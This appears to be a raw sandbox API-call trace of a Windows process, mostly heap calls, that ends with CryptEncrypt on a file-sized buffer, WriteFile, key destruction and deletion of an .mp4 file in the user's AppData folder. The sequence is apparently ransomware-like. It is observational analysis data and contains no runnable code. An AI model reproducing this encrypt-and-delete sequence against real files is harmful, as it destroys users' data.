RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0113.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0113.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0113.440] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4c8 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0113.440] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0113.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0113.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0113.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0113.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0113.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0113.497] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0113.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0113.497] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0113.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37ec418 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0113.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0113.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0113.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0113.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa2e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.501] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x161dc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x161e0) returned 1 [0113.501] CharLowerBuffW (in: lpsz="byte[90592]", cchLength=0xb | out: lpsz="byte[90592]") returned 0xb [0113.504] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.504] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.505] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa330, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.505] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37ec418*, pdwDataLen=0x8cef60*=0x161dc, dwBufLen=0x161e0 | out: pbData=0x37ec418*, pdwDataLen=0x8cef60*=0x161e0) returned 1 [0113.509] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.509] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.509] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.509] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.509] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.510] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.533] WriteFile (in: hFile=0x4ec, lpBuffer=0x37c0048*, nNumberOfBytesToWrite=0x161e0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesWritten=0x8cf5e4*=0x161e0, lpOverlapped=0x0) returned 1 [0113.535] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0113.535] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0113.535] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.535] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa360, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0113.535] CryptDestroyKey (hKey=0x9a43c0) returned 1 [0113.535] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.535] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.535] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.535] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.536] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.536] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.536] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.536] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.536] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.570] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.570] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.570] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.570] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.570] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.570] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.570] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.570] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0113.570] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0113.570] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.570] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.570] FreeLibrary (hLibModule=0x76390000) returned 1 [0113.570] CloseHandle (hObject=0x4b0) returned 1 [0113.571] CloseHandle (hObject=0x4ec) returned 1 [0113.575] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.575] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.575] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/5sRVNiax4.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\5sRVNiax4.mp4", lpFilePart=0x8cedf4*="5sRVNiax4.mp4") returned 0x2d [0113.575] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\5sRVNiax4.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\5srvniax4.mp4")) returned 0x20 [0113.575] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\5sRVNiax4.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77be1430, ftCreationTime.dwHighDateTime=0x1d5ca39, ftLastAccessTime.dwLowDateTime=0xfbe1e9a0, ftLastAccessTime.dwHighDateTime=0x1d5d1da, ftLastWriteTime.dwLowDateTime=0xfbe1e9a0, ftLastWriteTime.dwHighDateTime=0x1d5d1da, nFileSizeHigh=0x0, nFileSizeLow=0x161dc, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="5sRVNiax4.mp4", cAlternateFileName="5SRVNI~1.MP4")) returned 0x9a47c0 [0113.576] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\5sRVNiax4.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\5srvniax4.mp4")) returned 1 [0113.618] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77be1430, ftCreationTime.dwHighDateTime=0x1d5ca39, ftLastAccessTime.dwLowDateTime=0xfbe1e9a0, ftLastAccessTime.dwHighDateTime=0x1d5d1da, ftLastWriteTime.dwLowDateTime=0xfbe1e9a0, ftLastWriteTime.dwHighDateTime=0x1d5d1da, nFileSizeHigh=0x0, nFileSizeLow=0x161dc, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="5sRVNiax4.mp4", cAlternateFileName="5SRVNI~1.MP4")) returned 0 [0113.618] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0113.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0113.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.618] 